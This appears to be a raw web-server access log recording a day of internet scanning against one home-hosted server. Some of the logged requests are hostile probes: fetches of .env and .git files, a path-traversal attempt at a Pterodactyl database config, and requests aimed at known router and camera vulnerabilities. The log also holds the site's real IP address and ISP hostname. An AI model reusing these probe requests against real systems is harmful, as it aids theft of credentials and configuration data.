195.178.110.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/80.0.180 Chrome/74.0.3729.180 Safari/537.36" "-" +[13/Jan/2026:20:30:28 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:20:32:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 23.95.96.140] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:20:40:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:20:45:06 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 147.182.151.27] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[13/Jan/2026:20:45:07 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 147.182.151.27] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[13/Jan/2026:20:49:27 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 106.75.153.165] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:20:49:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 106.75.153.165] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:20:56:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:21:07:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:21:10:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.25] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:21:10:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.25] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:21:13:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:21:22:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.168.122.16] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:21:24:31 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 60.190.248.10] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:21:31:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:21:44:22 +0000] 400 - GET http 92.249.249.197 "/" [Client 20.168.13.44] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[13/Jan/2026:21:44:22 +0000] 400 - - http localhost "-" [Client 20.168.13.44] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:21:52:34 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:21:57:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:22:08:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:22:09:23 +0000] 400 - GET http 92.249.249.197 "/index.htm" [Client 45.194.92.18] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[13/Jan/2026:22:09:23 +0000] 400 - GET http 92.249.249.197 "/" [Client 45.194.92.18] [Length 252] [Gzip -] "-" "-" +[13/Jan/2026:22:09:44 +0000] 400 - - http localhost "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:22:10:29 +0000] 400 - - http localhost "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:22:20:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:22:23:25 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 112.46.214.126] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:22:23:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 68.66.175.190] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[13/Jan/2026:22:28:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:22:37:22 +0000] 400 - GET http 92.249.249.197 "/" [Client 167.94.138.61] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:22:37:25 +0000] 400 - - http localhost "-" [Client 167.94.138.61] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:22:37:43 +0000] 400 - GET http 92.249.249.197 "/robots.txt" [Client 167.94.138.61] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:22:40:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 206.168.34.51] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:22:40:03 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.51] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:22:40:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.51] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:22:40:07 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[13/Jan/2026:22:40:19 +0000] 404 - GET http 92.249.249.197 "/login" [Client 206.168.34.51] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:22:40:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.168.34.51] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:22:44:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:22:54:35 +0000] 404 - POST http 92.249.249.197 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://92.249.249.197:80/home.asp" +[13/Jan/2026:22:59:20 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:23:00:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:23:04:23 +0000] 400 - - http localhost "-" [Client 42.48.38.23] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:23:06:44 +0000] 400 - GET http 92.249.249.197 "/" [Client 114.97.190.155] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[13/Jan/2026:23:07:39 +0000] 400 - GET http 92.249.249.197 "/" [Client 61.133.211.66] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[13/Jan/2026:23:11:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:23:14:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 36.112.104.133] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" "-" +[13/Jan/2026:23:15:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:23:15:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 185.247.137.40] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[13/Jan/2026:23:29:51 +0000] 400 - GET http 92.249.249.197 "/" [Client 206.168.34.46] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:23:29:52 +0000] 400 - - http localhost "-" [Client 206.168.34.46] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:23:29:55 +0000] 400 - GET http 92.249.249.197 "/security.txt" [Client 206.168.34.46] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[13/Jan/2026:23:31:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[13/Jan/2026:23:33:32 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 193.142.147.209] [Length 150] [Gzip -] "-" "-" +[13/Jan/2026:23:36:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:23:54:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:23:55:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:23:57:59 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[13/Jan/2026:23:58:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 92.63.197.50] [Length 154] [Gzip -] "-" "-" +[13/Jan/2026:23:58:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 92.63.197.50] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[13/Jan/2026:23:59:50 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:00:01:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:00:10:02 +0000] 404 - GET http 92.249.249.197 "/admin/config.php" [Client 91.232.238.112] [Length 150] [Gzip -] "xfa1" "-" +[14/Jan/2026:00:14:58 +0000] 200 - GET http 92.249.249.197 "/" [Client 111.172.6.153] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.53 Mobile Safari/537.36" "-" +[14/Jan/2026:00:15:30 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:00:25:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:00:35:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 167.94.146.61] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:00:35:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.61] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:00:35:50 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:00:35:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.61] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:00:35:55 +0000] 404 - GET http 92.249.249.197 "/.well-known/security.txt" [Client 167.94.146.61] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:00:35:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.146.61] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:00:49:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:00:50:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:01:02:01 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:01:08:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/robots.txt" [Client 16.147.255.82] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[14/Jan/2026:01:08:57 +0000] 200 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 16.147.255.82] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[14/Jan/2026:01:09:14 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:01:13:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:01:18:14 +0000] 403 - GET http 92.249.249.197 "/locales/locale.json?locale=../../../pterodactyl&namespace=config/database" [Client 74.109.185.118] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:01:25:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:01:40:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:01:42:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:01:47:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 71.6.199.65] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[14/Jan/2026:01:48:00 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.192] [Length 1033] [Gzip -] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[14/Jan/2026:01:48:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.192] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:01:48:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 216.180.246.192] [Length 568] [Gzip 1.86] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[14/Jan/2026:01:53:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.192] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:01:53:39 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:02:05:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:02:06:33 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 77.83.39.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" "-" +[14/Jan/2026:02:07:33 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[14/Jan/2026:02:07:52 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[14/Jan/2026:02:09:39 +0000] 400 - GET http 92.249.249.197 "/" [Client 3.130.96.91] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[14/Jan/2026:02:12:17 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[14/Jan/2026:02:12:30 +0000] 404 - GET http 92.249.249.197 "/.git/HEAD" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "-" +[14/Jan/2026:02:12:31 +0000] 400 - - http localhost "-" [Client 3.130.96.91] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:02:12:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 20.65.154.146] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[14/Jan/2026:02:20:59 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:02:28:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:02:29:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:02:32:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:02:40:28 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:02:47:34 +0000] 404 - GET http 92.249.249.197 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[14/Jan/2026:02:48:50 +0000] 404 - GET http 92.249.249.197 "/developmentserver/metadatauploader" [Client 20.221.56.179] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[14/Jan/2026:02:56:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:03:11:39 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:03:18:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:18:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:18:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:18:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:18:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:18:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:18:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:18:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:03:20:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:03:27:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:03:46:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:04:11:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:04:11:17 +0000] 400 - GET http 92.249.249.197 "/.env" [Client 147.182.151.27] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[14/Jan/2026:04:11:17 +0000] 400 - GET http 92.249.249.197 "/.git/config" [Client 147.182.151.27] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[14/Jan/2026:04:23:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:04:25:47 +0000] 200 - GET http 92.249.249.197 "/" [Client 118.194.251.144] [Length 1033] [Gzip -] "curl/7.29.0" "-" +[14/Jan/2026:04:25:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 118.194.251.144] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:04:25:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 118.194.251.144] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:04:25:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 91.224.92.14] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:04:26:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 165.154.206.139] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/591.37 (KHTML, like Gecko) Chrome/72.0.2677 Safari/537.36" "-" +[14/Jan/2026:04:26:20 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:04:26:20 +0000] 404 - GET http 92.249.249.197 "/robots.txt" [Client 165.154.206.139] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:26:20 +0000] 404 - GET http 92.249.249.197 "/sitemap.xml" [Client 165.154.206.139] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:04:28:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:04:34:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:04:42:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.1.52] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:04:43:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:04:44:46 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 93.123.72.132] [Length 183] [Gzip 3.21] 